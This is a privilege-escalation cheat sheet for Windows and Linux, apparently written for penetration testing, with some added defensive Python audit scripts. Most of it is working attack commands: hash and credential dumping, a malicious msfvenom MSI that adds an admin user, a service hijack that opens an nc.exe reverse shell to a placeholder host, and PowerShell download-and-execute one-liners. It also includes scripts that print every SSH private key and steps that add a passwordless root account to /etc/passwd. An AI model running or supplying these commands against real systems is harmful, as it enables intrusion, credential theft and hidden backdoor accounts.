Privilege escalation
One of the fun parts!

Windows

Windows versions

Windows OS                          Version number
Windows 1.0                         1.04
Windows 2.0                         2.11
Windows 3.0                         3
Windows NT 3.1                      3.10.528
Windows for Workgroups 3.11         3.11
Windows NT Workstation 3.5          3.5.807
Windows NT Workstation 3.51         3.51.1057
Windows 95                          4.0.950
Windows NT Workstation 4.0          4.0.1381
Windows 98                          4.1.1998
Windows 98 Second Edition           4.1.2222
Windows Me                          4.90.3000
Windows 2000 Professional           5.0.2195
Windows XP                          5.1.2600
Windows Vista                       6.0.6000
Windows 7                           6.1.7600
Windows 8.1                         6.3.9600
Windows 10                          10.0.10240

Windows NT / Server release (editions indented)     NT version
Windows NT 3.51                                     NT 3.51
Windows NT 3.5                                      NT 3.50
Windows NT 3.1                                      NT 3.10
Windows 2000                                        NT 5.0
    Windows 2000 Server
    Windows 2000 Advanced Server
    Windows 2000 Datacenter Server
Windows NT 4.0                                      NT 4.0
    Windows NT 4.0 Server
    Windows NT 4.0 Server Enterprise
    Windows NT 4.0 Terminal Server Edition
Windows Server 2003                                 NT 5.2
    Windows Small Business Server 2003
    Windows Server 2003 Web Edition
    Windows Server 2003 Standard Edition
    Windows Server 2003 Enterprise Edition
    Windows Server 2003 Datacenter Edition
    Windows Storage Server
Windows Server 2003 R2                              NT 5.2
    Windows Small Business Server 2003 R2
    Windows Server 2003 R2 Web Edition
    Windows Server 2003 R2 Standard Edition
    Windows Server 2003 R2 Enterprise Edition
    Windows Server 2003 R2 Datacenter Edition
    Windows Compute Cluster Server 2003 (CCS)
    Windows Storage Server
    Windows Home Server
Windows Server 2008                                 NT 6.0
    Windows Server 2008 Standard
    Windows Server 2008 Enterprise
    Windows Server 2008 Datacenter
    Windows Server 2008 for Itanium-based Systems
    Windows Server Foundation 2008
    Windows Essential Business Server 2008
    Windows HPC Server 2008
    Windows Small Business Server 2008
    Windows Storage Server 2008
    Windows Web Server 2008
Windows Server 2008 R2                              NT 6.1
    Windows Server 2008 R2 Foundation
    Windows Server 2008 R2 Standard
    Windows Server 2008 R2 Enterprise
    Windows Server 2008 R2 Datacenter
    Windows Server 2008 R2 for Itanium-based Systems
    Windows Web Server 2008 R2
    Windows Storage Server 2008 R2
    Windows HPC Server 2008 R2
    Windows Small Business Server 2011
    Windows MultiPoint Server 2011
    Windows Home Server 2011
    Windows MultiPoint Server 2010
Windows Server 2012                                 NT 6.2
    Windows Server 2012 Foundation
    Windows Server 2012 Essentials
    Windows Server 2012 Standard
    Windows Server 2012 Datacenter
    Windows MultiPoint Server 2012
Windows Server 2012 R2                              NT 6.3
    Windows Server 2012 R2 Foundation
    Windows Server 2012 R2 Essentials
    Windows Server 2012 R2 Standard
    Windows Server 2012 R2 Datacenter
Windows Server 2016                                 NT 10.0

Users

Current user:
whoami
echo %username%
Which user privileges do we have?
whoami /priv
Which users are there?
net users
Maybe we are local admin already?
net localgroup administrators
Credential manager:
cmdkey /list
Currently cached Kerberos tickets (and maybe some info about other network components):
klist
Are there other logged in users?
qwinsta

Passwords

Dump the local password hashes with fgdump (local copy: /usr/share/windows-binaries/fgdump/fgdump.exe):
C:\> fgdump.exe
C:\> type 127.0.0.1.pwdump
FGDump - aldeid
If the target is a domain controller, search for "cpassword" within groups.xml (and the other policy XML files in SYSVOL):
findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml

Search for passwords

Search for files that contain "password" in the filename:
dir /s *password*
Search for "password" inside files:
findstr /si password *.ini *.xml *.txt
findstr /spin "password" *.*
Some common files:
type c:\sysprep.inf
type c:\sysprep\sysprep.xml
type c:\unattend.xml
type %WINDIR%\Panther\Unattend\Unattended.xml
type %WINDIR%\Panther\Unattended.xml
dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul
dir c:\*vnc.ini /s /b
dir c:\*ultravnc.ini /s /b
dir c:\ /s /b | findstr /si *vnc.ini
Moaaahr files:
%windir%\repair\sam
%windir%\System32\config\RegBack\SAM
%windir%\repair\system
%windir%\repair\software
%windir%\repair\security
%windir%\debug\NetSetup.log (AD domain name, DC name, internal IP, DA account)
%windir%\iis6.log (5,6 or 7)
%windir%\system32\logfiles\httperr\httperr1.log
C:\sysprep.inf
C:\sysprep\sysprep.inf
C:\sysprep\sysprep.xml
%windir%\Panther\Unattended.xml
C:\inetpub\wwwroot\Web.config
%windir%\system32\config\AppEvent.Evt (Application log)
%windir%\system32\config\SecEvent.Evt (Security log)
%windir%\system32\config\default.sav
%windir%\system32\config\security.sav
%windir%\system32\config\software.sav
%windir%\system32\config\system.sav
%windir%\system32\inetsrv\config\applicationHost.config
%windir%\system32\inetsrv\config\schema\ASPNET_schema.xml
%windir%\System32\drivers\etc\hosts (dns entries)
%windir%\System32\drivers\etc\networks (network settings)
%windir%\system32\config\SAM (only really useful if you have access to the files while the machine is off)

Unquoted Service Path

List auto-start services whose binary lives outside C:\Windows and whose path is not wrapped in quotes (an unquoted path containing spaces is resolved piece by piece by the service control manager):
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
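The one-liner above flags every unquoted, auto-start path outside C:\Windows, but an unquoted path is only an issue when the executable portion itself contains a space. The following Python audit is an added example, not code from the page or from any tool it mentions. It assumes the CSV output form of wmic (`/format:csv`, whose header row names the columns) and runs on a constructed sample; it applies the same two filters as the one-liner, adds the space test, and lists the intermediate paths Windows resolves before the real binary, which are the locations whose ACLs a defender has to confirm are not writable by standard users (the fix itself is to quote the service's ImagePath).

```python
import csv
import io
import re

# Constructed sample in the shape of
#   wmic service get name,displayname,pathname,startmode /format:csv
# (assumed layout; the parser keys on the header names, not column order).
# Host name and services are made up for this example.
SAMPLE_WMIC_CSV = r'''
Node,DisplayName,Name,PathName,StartMode
WS01,Print Spooler,Spooler,C:\Windows\System32\spoolsv.exe,Auto
WS01,Example Service,ExampleSvc,C:\Program Files\Example Vendor\svc host\example.exe -k net,Auto
WS01,Quoted Service,QuotedSvc,"""C:\Program Files\Quoted Vendor\quoted.exe"" /service",Auto
WS01,No Space Service,NoSpaceSvc,C:\Tools\nospace.exe,Auto
WS01,Manual Service,ManualSvc,C:\Program Files\Manual Vendor\manual.exe,Manual
'''

# First ".exe" that is followed by whitespace or end of string.
_EXE_RE = re.compile(r"(?i)^(.+?\.exe)(?=\s|$)")


def executable_part(pathname: str) -> tuple:
    """Split a service PathName into (executable path, was_quoted).

    A quoted path is taken up to the closing quote. For an unquoted path the
    executable is everything up to the first '.exe' followed by whitespace or
    end of string; any arguments after it are dropped.
    """
    p = pathname.strip()
    if p.startswith('"'):
        end = p.find('"', 1)
        return (p[1:end] if end != -1 else p[1:]), True
    m = _EXE_RE.match(p)
    return (m.group(1) if m else p.split(" ")[0]), False


def lookup_order(exe: str) -> list:
    """Paths tried, in order, before the intended binary when an unquoted
    path contains spaces: each prefix ending at a space, with '.exe' added.
    Verify none of these locations is writable by standard users."""
    return [exe[:i] + ".exe" for i, ch in enumerate(exe) if ch == " "]


def audit_wmic_csv(csv_text: str, auto_only: bool = True) -> list:
    """One finding per service whose binary path is unquoted AND contains a
    space. Mirrors the one-liner's filters (auto-start only, skip C:\\Windows)
    but also requires a space in the executable portion, because an unquoted
    path without spaces resolves unambiguously."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text.strip())):
        if auto_only and row["StartMode"].strip().lower() != "auto":
            continue
        exe, quoted = executable_part(row["PathName"])
        if quoted or " " not in exe:
            continue
        if exe.lower().startswith("c:\\windows\\"):
            continue
        findings.append({"name": row["Name"], "exe": exe, "check": lookup_order(exe)})
    return findings


if __name__ == "__main__":
    for f in audit_wmic_csv(SAMPLE_WMIC_CSV):
        print(f"{f['name']}: {f['exe']}")
        for path in f["check"]:
            print(f"    verify not writable: {path}")
```

On the sample only ExampleSvc is reported: the quoted service and the path without spaces are clean, and the manual-start service is skipped unless `auto_only=False`.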

AlwaysInstallElevated

Check if both of the following registry values are set to "1":
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
If so, create your own malicious MSI that will add a local user:
msfvenom -p windows/adduser USER=hodor PASS=Qwerty123! -f msi -o hodor.msi
And execute it:
msiexec /quiet /qn /i C:\hodor.msi

upnp host

sc qc upnphost
sc config upnphost binpath= "C:\nc.exe -nv x.x.x.x -e C:\WINDOWS\System32\cmd.exe"
sc config upnphost obj= ".\LocalSystem" password= ""
sc qc upnphost
net start upnphost
Got an error for a missing dependency? Start it first:
sc config SSDPSRV start= auto
net start SSDPSRV
net start upnphost
Or just remove the dependency:
sc config upnphost depend= ""

Scheduled tasks

List scheduled tasks:
schtasks /query /fo LIST /v
Running processes linked to services:
tasklist /SVC

PowerShell tools

PowerUp checks for common Windows privesc vectors:
PowerTools/PowerUp.ps1 at master · PowerShellEmpire/PowerTools
Download on the target:
IEX(New-Object Net.Webclient).downloadString('http://x.x.x.x:8000/PowerUp.ps1')
Add to the bottom of the script:
Invoke-AllChecks
Run:
powershell.exe -nop -exec bypass
PS C:\> Import-Module .\PowerUp.ps1
PS C:\> Invoke-AllChecks

Sherlock (missing-patch checks):
Sherlock/Sherlock.ps1 at master · rasta-mouse/Sherlock
Download on the target:
IEX(New-Object Net.Webclient).downloadString('http://x.x.x.x:8000/Sherlock.ps1')
Add to the bottom of the script:
Find-AllVulns
Run:
powershell.exe -nop -exec bypass
PS C:\> Import-Module .\Sherlock.ps1
PS C:\> Find-AllVulns

GitHub - samratashok/nishang: Nishang - Offensive PowerShell for red team, penetration testing and offensive security.

Cross compiling

Compile a Windows exploit on Linux (mingw-w64 cross compiler):
i686-w64-mingw32-gcc 18176.c -lws2_32 -o 18176.exe
Compile a Python script to a Windows executable (PyInstaller under wine):
wine ~/.wine/drive_c/Python27/Scripts/pyinstaller.exe --onefile exploit.py

Misc

ms03-026
ms03-039 (1)
ms03-039 (2)
ms03-049
ms04-007
ms04-011 - ssl bof
ms04-011 - lsasarv.dll
ms04-031
ms05-017
ms05-039
ms06-040 (1)
ms06-040 (2)
ms06-070
ms08-067 (1)
ms08-067 (2)
ms08-067 (3)
ms09-050

ms04-011
ms04-019 (1)
ms04-019 (2)
ms04-019 (3)
ms04-020
keybd_event
ms05-018
ms05-055
ms06-030
ms06-049
print spool service
ms08-025
netdde
ms10-015
ms10-059
ms10-092
ms11-080
ms14-040
ms14-058 (1)
ms14-058 (2)
ms14-070 (1)
ms14-070 (2)
ms15-010 (1)
ms15-010 (2)
ms15-051
ms16-014
ms16-016
ms16-032

Precompiled exploits

GitHub - abatchy17/WindowsExploits: Windows exploits, mostly precompiled. Not being updated. Check https://github.com/SecWiki/windows-kernel-exploits instead.
http://www.bhafsec.com/wiki/index.php/Windows_Privilege_Escalation
GitHub - SecWiki/windows-kernel-exploits: windows-kernel-exploits (collection of Windows privilege escalation vulnerabilities)

Linux

Sudo

cat /etc/sudoers
sudo -l
Becoming a super hero is a fairly straightforward process. Some example sudoers entries:
root ALL=(ALL) ALL
The root user can execute from ALL terminals, acting as ALL (any) users, and run ALL (any) commands.
john ALL= /sbin/poweroff
The user john can, from any terminal, run the poweroff command, authenticating with john's own password.
john ALL = (root) NOPASSWD: /usr/bin/scp
The user john can, from any terminal, run scp as root without entering a password.
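As an added example (not from the original page or from g0tmi1k's blog), a small Python audit that parses user specifications written in the sudoers syntax just described and flags the two grants a reviewer most wants to see: an unrestricted command set (ALL) for anyone other than root, and NOPASSWD, which removes the only authentication step between a compromised user session and root. The sudoers content is constructed; the assumption that a missing (runas) part means root follows the sudoers(5) default.

```python
import re

# Constructed /etc/sudoers excerpt for this example (not from any real host).
SAMPLE_SUDOERS = """\
# /etc/sudoers (constructed sample)
Defaults        env_reset
root    ALL=(ALL) ALL
%admin  ALL=(ALL) ALL
john    ALL= /sbin/poweroff
john    ALL = (root) NOPASSWD: /usr/bin/scp
backup  ALL=(ALL) NOPASSWD: ALL
@includedir /etc/sudoers.d
"""

# user_or_%group  hosts = (runas) [TAG:] command[, command...]
_SPEC_RE = re.compile(
    r"^(?P<user>[^\s#]+)\s+(?P<hosts>\S+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z_]+:\s*)*)"
    r"(?P<cmds>.+)$"
)

# Lines that are not user specifications and must not be parsed as one.
_SKIP_PREFIXES = ("Defaults", "User_Alias", "Runas_Alias",
                  "Host_Alias", "Cmnd_Alias", "@include")


def parse_sudoers(text: str) -> list:
    """Return one dict per user specification line; comments, Defaults,
    alias definitions and include directives are ignored."""
    rules = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or line.startswith(_SKIP_PREFIXES):
            continue
        m = _SPEC_RE.match(line)
        if not m:
            continue
        tags = [t.strip() for t in m.group("tags").split(":") if t.strip()]
        rules.append({
            "user": m.group("user"),
            "hosts": m.group("hosts"),
            # sudoers(5): without a (runas) list the command runs as root
            "runas": (m.group("runas") or "root").strip(),
            "nopasswd": "NOPASSWD" in tags,
            "commands": [c.strip() for c in m.group("cmds").split(",")],
        })
    return rules


def risky_rules(rules: list) -> list:
    """(user, reasons) for grants worth reviewing: ALL commands for a
    non-root principal, and any NOPASSWD tag."""
    findings = []
    for r in rules:
        reasons = []
        if r["user"] != "root" and "ALL" in r["commands"]:
            reasons.append("unrestricted command set (ALL)")
        if r["nopasswd"]:
            reasons.append("NOPASSWD")
        if reasons:
            findings.append((r["user"], ", ".join(reasons)))
    return findings


if __name__ == "__main__":
    for user, why in risky_rules(parse_sudoers(SAMPLE_SUDOERS)):
        print(f"{user}: {why}")
```

The two john lines from the text parse exactly as described: the poweroff rule runs as root but still requires john's password, the scp rule runs as root with no password and is therefore flagged.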
Below is a selection from g0tmi1k's privesc blog, which I use a lot.

Distribution type & kernel version

cat /etc/*release*
uname -a
rpm -q kernel
dmesg | grep -i linux

Default writeable directory / folder

/tmp
/dev/shm

Search for passwords

Search for password within config.php:
grep -R 'password' config.php
Search the whole system:
find / -type f -exec grep -H 'password' {} \; 2>/dev/null
grep -R -i "password" 2> >(grep -v 'Permission denied' >&2)
Moaaar grepping:
grep -i user [filename]
grep -i pass [filename]
grep -C 5 "password" [filename]
find . -name "*.php" -print0 | xargs -0 grep -i -n 'var $password'
(single quotes keep the shell from expanding $password before grep sees it)

Find possible other writeable directory / folder

find / -type d \( -perm -g+w -or -perm -o+w \) -exec ls -adl {} \;

Service(s) running as root user

ps aux | grep root
ps -ef | grep root

Installed applications

ls -lah /usr/bin/
ls -lah /sbin/
dpkg -l
rpm -qa
ls -lah /var/cache/apt/archives
ls -lah /var/cache/yum/

Scheduled jobs

crontab -l
ls -la /etc/cron*
ls -lah /var/spool/cron
ls -la /etc/ | grep cron
cat /etc/crontab
cat /etc/anacrontab

Search for juicy shizzle

grep -rnw '/etc/passwd' -e 'root'

authorized_keys: contains the public keys of the authorised client(s), i.e. it specifies the SSH keys that can be used to log into the user account for which the file is configured. This file lets the server authenticate the user.
id_rsa: contains the private key for the client. This RSA key can be used with SSH protocols 1 or 2.
id_rsa.pub: contains the public key for the client.
id_dsa: contains the private key for the client. This (insecure) DSA key can only be used with SSH protocol 2.
id_dsa.pub: contains the public key for the client.
known_hosts: contains a list of host keys for the hosts the client has ever connected to.

#!/bin/bash
# Print every readable id_rsa under the home directories listed in /etc/passwd
for X in $(cut -f6 -d ':' /etc/passwd |sort |uniq); do
  if [ -s "${X}/.ssh/id_rsa" ]; then
    echo "### ${X}: "
    cat "${X}/.ssh/id_rsa"
    echo ""
  fi
done

#!/bin/bash
# Same for id_dsa
for X in $(cut -f6 -d ':' /etc/passwd |sort |uniq); do
  if [ -s "${X}/.ssh/id_dsa" ]; then
    echo "### ${X}: "
    cat "${X}/.ssh/id_dsa"
    echo ""
  fi
done

Sticky bit
find / -perm -1000 -type d 2>/dev/null
SGID (chmod 2000)
find / -perm -g=s -type f 2>/dev/null
SUID (chmod 4000)
find / -perm -u=s -type f 2>/dev/null
find /* -user root -perm -4000 -print 2>/dev/null
SUID or SGID (the parentheses are needed so that -type f applies to both branches)
find / \( -perm -g=s -o -perm -u=s \) -type f 2>/dev/null

Add user to /etc/passwd and root group

Example: the following file has the SUID bit set:
/usr/bin/nano
We can use it to run nano as root and add a new root user to /etc/passwd. First create a password hash for "hodor" with salt "hodor":
perl -e 'print crypt("hodor", "hodor"),"\n"'
Add to /etc/passwd using nano:
hodor:how7QNOjM.95M:0:0:root:/root:/bin/bash
Switch to the new user:
su hodor

Or, if /etc/passwd is writeable, append an entry with an empty password field:
echo hodor::0:0:root:/root:/bin/bash >> /etc/passwd
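As an added example (not part of the original page), a Python check for the traces the two passwd edits above leave behind: a UID 0 account that is not root, a hash stored directly in the world-readable /etc/passwd (here the traditional 13-character crypt(3) form shown above), an empty password field, and a duplicated user name. The /etc/passwd content is constructed; the hash value is the one the perl line above produces.

```python
import re

# Constructed /etc/passwd content for this example (no real system). The last
# two entries are the shape of line the text above adds: a UID 0 account with
# a traditional crypt(3) hash, and one with an empty password field.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
hodor:how7QNOjM.95M:0:0:root:/root:/bin/bash
hodor::0:0:root:/root:/bin/bash
"""

# Traditional DES crypt(3): 2-char salt + 11 chars, alphabet [./0-9A-Za-z]
_DES_CRYPT_RE = re.compile(r"^[./0-9A-Za-z]{13}$")
_MODULAR_SCHEMES = {"$1$": "md5-crypt", "$5$": "sha256-crypt",
                    "$6$": "sha512-crypt", "$y$": "yescrypt"}


def hash_scheme(pw_field: str):
    """Classify the password field: None for the shadow placeholder ('x', '*')
    or a locked account ('!...'), 'empty' for no password at all, otherwise
    the hash scheme name ('unknown' if not recognised)."""
    if pw_field in ("x", "*") or pw_field.startswith("!"):
        return None
    if pw_field == "":
        return "empty"
    for prefix, name in _MODULAR_SCHEMES.items():
        if pw_field.startswith(prefix):
            return name
    if _DES_CRYPT_RE.match(pw_field):
        return "des-crypt"
    return "unknown"


def parse_passwd(text: str) -> list:
    """Parse passwd(5) lines into dicts; malformed lines are kept and flagged."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7 or not fields[2].isdigit() or not fields[3].isdigit():
            entries.append({"line": lineno, "name": fields[0], "malformed": True})
            continue
        name, pw, uid, gid, gecos, home, shell = fields
        entries.append({"line": lineno, "name": name, "pw": pw, "uid": int(uid),
                        "gid": int(gid), "home": home, "shell": shell,
                        "malformed": False})
    return entries


def audit_passwd(text: str) -> list:
    """(line, account, reason) for each condition the passwd manipulation
    above produces, plus a hash stored outside /etc/shadow."""
    findings = []
    seen = set()
    for e in parse_passwd(text):
        if e["malformed"]:
            findings.append((e["line"], e["name"], "malformed entry"))
            continue
        if e["name"] in seen:
            findings.append((e["line"], e["name"], "duplicate user name"))
        seen.add(e["name"])
        if e["uid"] == 0 and e["name"] != "root":
            findings.append((e["line"], e["name"], "UID 0 account other than root"))
        scheme = hash_scheme(e["pw"])
        if scheme == "empty":
            findings.append((e["line"], e["name"],
                             "empty password field: login needs no password"))
        elif scheme is not None:
            findings.append((e["line"], e["name"],
                             f"password hash ({scheme}) kept in world-readable /etc/passwd"))
    return findings


if __name__ == "__main__":
    for lineno, name, reason in audit_passwd(SAMPLE_PASSWD):
        print(f"line {lineno} ({name}): {reason}")
```

A clean file (root as the only UID 0 entry, every password field 'x' or locked) yields no findings, so the function can be run directly against a live /etc/passwd as a periodic integrity check.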

Linux local exploits

kernel 2.4.x / 2.6.x (sock_sendpage 1)
kernel 2.4 / 2.6 (sock_sendpage 2)
kernel < 2.6.22 (ftruncate)
kernel < 2.6.34 (cap_sys_admin)
kernel 2.6.27 < 2.6.36 (compat)
kernel < 2.6.36-rc1 (can bcm)
kernel <= 2.6.36-rc8 (rds protocol)
kernel < 2.6.36.2 (half nelson)
kernel <= 2.6.37 (full nelson)
kernel 2.6 (udev)
kernel 3.13 (sgid)
kernel 3.13.0 < 3.19 (overlayfs 1)
kernel 3.14.5 (libfutex)
kernel 2.6.39 <= 3.2.2 (mempodipper)
*kernel 2.6.28 / 3.0 (alpha-omega)
kernel 2.6.22 < 3.9 (Dirty Cow)
kernel 3.7.6 (msr)
*kernel < 3.8.9 (perf_swevent_init)
kernel <= 4.3.3 (overlayfs 2)
kernel 4.3.3 (overlayfs 3)
kernel 4.4.0 (af_packet)
kernel 4.4.x (double-fdput)
kernel 4.4.0-21 (netfilter)
kernel 4.4.1 (refcount)

Precompiled exploits

GitHub - SecWiki/linux-kernel-exploits: linux-kernel-exploits (collection of Linux privilege escalation vulnerabilities)
GitHub - xairy/linux-kernel-exploitation: A collection of links related to Linux kernel security and exploitation